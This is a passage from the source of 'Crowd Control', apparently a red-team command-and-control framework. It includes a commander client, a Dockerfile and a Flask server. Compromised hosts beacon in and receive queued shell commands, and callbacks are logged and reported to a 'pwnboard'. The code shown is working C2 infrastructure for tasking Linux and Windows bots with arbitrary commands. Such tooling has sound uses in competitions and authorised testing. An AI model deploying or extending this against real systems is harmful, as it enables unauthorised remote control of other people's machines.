 98 |     request = requests.get(url=server + "/api/commander/calls")
 99 |     if request.status_code != 200:
100 |         print("{}:\n{}".format(request.status_code, request.content))
101 |         return ""
102 |     return request.text
103 | 
104 | def show_tasks():
105 |     request = requests.get(url=server + "/api/commander/tasks")
106 |     if request.status_code != 200:
107 |         print("{}:\n{}".format(request.status_code, request.content))
108 |         return ""
109 |     return request.text
110 | 
111 | def show(args):
112 |     if "recent" in args:
113 |         data = show_recent()
114 |         print("Recent Hosts:")
115 |         for host in data:
116 |             print("{}: {}".format(host, list(data[host])))
117 |     elif "call" in args:
118 |         print(show_calls())
119 |     elif "task" in args:
120 |         print(show_tasks())
121 |     return
122 | 
123 | 
124 | def help():
125 |     print("Crowd Control client")
126 |     print("export CC_SERVER or modify {} to change the server".format(sys.argv[0]))
127 |     print()
128 |     print("Current server: " + server)
129 |     print("New task:                `t: <hosts|hosts.txt>: commands`")
130 |     print("New task script:         `ts: host[ hosts...]: <script file>`")
131 |     print("Show recent hosts:       `s: recent`")
132 |     print("Show callbacks log:      `s: calls`")
133 |     print("Show tasks log:          `s: tasks`")
134 |     quit("\nExample usage:\n\t{} t: 1.1.1.1 2.2.2.2 host3: echo hi".format(sys.argv[0]))
135 | 
136 | if __name__ == "__main__":
137 |     # Get the server from the enivronment
138 |     server = os.environ.get("CC_SERVER", "http://cc.c2the.world")
139 |     # requests doesnt like it when there isnt a protocol
140 |     if not server.startswith("http://") and not server.startswith("https://"):
141 |         server = "http://" + server
142 |     # Remove trailing /
143 |     server = server.rstrip('/')
144 | 
145 |     # Show the help if we need
146 |     if len(sys.argv) < 2:
147 |         help()
148 |     else:
149 |         args = " ".join(sys.argv[1:])
150 |         if args.startswith("ts:") or args.startswith("t:"):
151 |             new_task(args)
152 |         elif args.startswith("s:"):
153 |             show(args)
154 |         else:
155 |             help()
156 | 


--------------------------------------------------------------------------------
/commander/requirements.txt:
--------------------------------------------------------------------------------
1 | requests>=2.0.0


--------------------------------------------------------------------------------
/server/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM alpine:latest
 2 | RUN apk add --update python3 tzdata
 3 | 
 4 | # Set the timezone
 5 | ENV TZ=America/New_York
 6 | RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
 7 | 
 8 | COPY ./requirements.txt /app/requirements.txt
 9 | WORKDIR /app
10 | RUN pip3 install -r requirements.txt
11 | 
12 | # Set up the data directories for the app
13 | COPY . /app
14 | RUN mkdir -p /tmp/cc/hosts
15 | RUN mkdir -p /tmp/cc/windows/hosts
16 | RUN touch /tmp/cc/calls.log /tmp/cc/tasks.log /tmp/cc/windows/calls.log /tmp/cc/windows/tasks.log 
17 | 
18 | # Run the app
19 | ENTRYPOINT [ "python3" ]
20 | CMD [ "app.py" ]
21 | 
22 | 


--------------------------------------------------------------------------------
/server/app.py:
--------------------------------------------------------------------------------
  1 | """
  2 | Process POST/GET requests from clients/commander, distribute commands and keep track of bot callbacks
  3 | @author: degenerat3
  4 | """
  5 | 
  6 | import datetime
  7 | import os
  8 | import requests
  9 | from flask import Flask, request
 10 | 
 11 | 
 12 | 
 13 | app = Flask(__name__)
 14 | 
 15 | all_hosts = set()
 16 | 
 17 | @app.route('/')
 18 | @app.route('/status')
 19 | def status():
 20 |     return "Crowd Control is running"
 21 | 
 22 | 
 23 | @app.route('/<ip>/<typ>')
 24 | @app.route('/api/callback/<ip>/<typ>')
 25 | def process_callbacks(ip, typ):
 26 |     updatePwnboard(ip, typ)
 27 |     global all_hosts
 28 |     all_hosts.add(ip)
 29 |     src = typ
 30 |     call_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
 31 | 
 32 |     if os.path.isfile("/tmp/cc/calls.log"):
 33 |         with open("/tmp/cc/calls.log", 'a') as f:
 34 |             s = "{0:<25} {1:<16} {2:<10}\n".format(call_time, ip, src)
 35 |             f.write(s)
 36 |     else:
 37 |         with open("/tmp/cc/calls.log", 'w') as f:
 38 |             s = "{0:<25} {1:<16} {2:<10}\n".format(call_time, ip, src)
 39 |             f.write(s)
 40 |     com_file = "/tmp/cc/hosts/" + ip
 41 |     if os.path.isfile(com_file):
 42 |         with open(com_file, 'r') as f:
 43 |             c = f.read()
 44 |             os.remove(com_file)
 45 |             return c + "\n"
 46 |     
 47 |     else:
 48 |         return "#lmao\n" 
 49 | 
 50 | 
 51 | @app.route('/api/windows/callback/<ip>/<typ>')
 52 | def process_win_callbacks(ip, typ):
 53 |     global all_hosts
 54 |     all_hosts.add(ip)
 55 |     src = typ
 56 |     call_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
 57 | 
 58 |     if os.path.isfile("/tmp/cc/windows/calls.log"):
 59 |         with open("/tmp/cc/windows/calls.log", 'a') as f:
 60 |             s = "{0:<25} {1:<16} {2:<10}\n".format(call_time, ip, src)
 61 |             f.write(s)
 62 |     else:
 63 |         with open("/tmp/cc/windows/calls.log", 'w') as f:
 64 |             s = "{0:<25} {1:<16} {2:<10}\n".format(call_time, ip, src)
 65 |             f.write(s)
 66 |     com_file = "/tmp/cc/windows/hosts/" + ip
 67 |     if os.path.isfile(com_file):
 68 |         with open(com_file, 'r') as f:
 69 |             c = f.read()
 70 |             os.remove(com_file)
 71 |             return c + "\n"
 72 |     else:
 73 |         return "#cls\n" 
 74 | 
 75 | 
 76 | def log_action(hosts, cmds):
 77 |     action_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
 78 |     log_str = action_time + " : " + str(hosts) + " : " + cmds + "\n"
 79 |     with open("/tmp/cc/tasks.log", 'a') as f:
 80 |         f.write(log_str)
 81 | 
 82 | def log_windows_action(hosts, cmds):
 83 |     action_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
 84 |     log_str = action_time + " : " + str(hosts) + " : " + cmds + "\n"
 85 |     with open("/tmp/cc/windows/tasks.log", 'a') as f:
 86 |         f.write(log_str)
 87 | 
 88 | @app.route('/api/commander/push', methods=['POST'])
 89 | def proc_inc_coms():
 90 |     content = request.json 
 91 |     host_str = content['hosts']
 92 |     coms = content['commands']
 93 |     if host_str.strip() == "all":    
 94 |         hosts = list(all_hosts)
 95 |     else:
 96 |         hosts = host_str.split('|')
 97 | 
 98 |     log_action(hosts, coms)
 99 |     for h in hosts:
100 |         com_file = "/tmp/cc/hosts/" + h
101 |         if os.path.isfile(com_file):
102 |             with open(com_file, 'a') as f:
103 |                 f.write(coms)
104 |         else:
105 |             with open(com_file, 'w') as f:
106 |                 f.write(coms)
107 |     return ""
108 | 
109 | 
110 | @app.route('/api/windows/commander/push', methods=['POST'])
111 | def proc_inc_win_coms():
112 |     content = request.json 
113 |     host_str = content['hosts']
114 |     coms = content['commands']
115 |     if host_str.strip() == "all":    
116 |         hosts = list(all_hosts)
117 |     else:
118 |         hosts = host_str.split('|')
119 | 
120 |     log_action(hosts, coms)
121 |     for h in hosts:
122 |         com_file = "/tmp/cc/windows/hosts/" + h
123 |         if os.path.isfile(com_file):
124 |             with open(com_file, 'a') as f:
125 |                 f.write(coms)
126 |         else:
127 |             with open(com_file, 'w') as f:
128 |                 f.write(coms)
129 |     return ""
130 | 
131 | @app.route('/api/commander/calls')
132 | def show_call_log():
133 |     with open("/tmp/cc/calls.log", 'r') as f:
134 |         s = f.read()
135 |         return s
136 | 
137 | @app.route('/api/commander/tasks')
138 | def show_action_log():
139 |     with open("/tmp/cc/tasks.log", 'r') as f:
140 |         s = f.read()
141 |         return s
142 | 
143 | @app.route('/api/windows/commander/calls')
144 | def show_win_call_log():
145 |     with open("/tmp/cc/windows/calls.log", 'r') as f:
146 |         s = f.read()
147 |         return s
148 | 
149 | @app.route('/api/windows/commander/tasks')
150 | def show_win_action_log():
151 |     with open("/tmp/cc/windows/tasks.log", 'r') as f:
152 |         s = f.read()
153 |         return s
154 | 
155 | 
156 | def updatePwnboard(ip, typ):
157 |     host = os.environ.get("PWNBOARD_URL", "")
158 |     msg = "CrowdControl received a beacon from " + typ
159 |     if not host:
160 |         return
161 |     data = {'ip': ip, 'application': "CrowdControl", 'message': msg}
162 |     try:
163 |         req = requests.post(host, json=data, timeout=3)
164 |         return True
165 |     except Exception as E:
166 |         print("Cannot update pwnboard: {}".format(E))
167 |         return False
168 | 
169 | 
170 | 
171 | if __name__ == '__main__':
172 |     host = os.environ.get("FLASK_HOST", "0.0.0.0")
173 |     try:
174 |         port = os.environ.get("FLASK_PORT", "5000")
175 |         port = int(port)
176 |     except ValueError:
177 |         port = 5000
178 |     debug = os.environ.get("FLASK_DEBUG", "False")
179 |     debug = debug.lower().strip() in ["true", "yes", "1", "t"]
180 |     app.run(debug=debug, host=host, port=port)
181 | 
182 | 
183 | 


--------------------------------------------------------------------------------
/server/requirements.txt:
--------------------------------------------------------------------------------
1 | Flask
2 | requests
3 | 


--------------------------------------------------------------------------------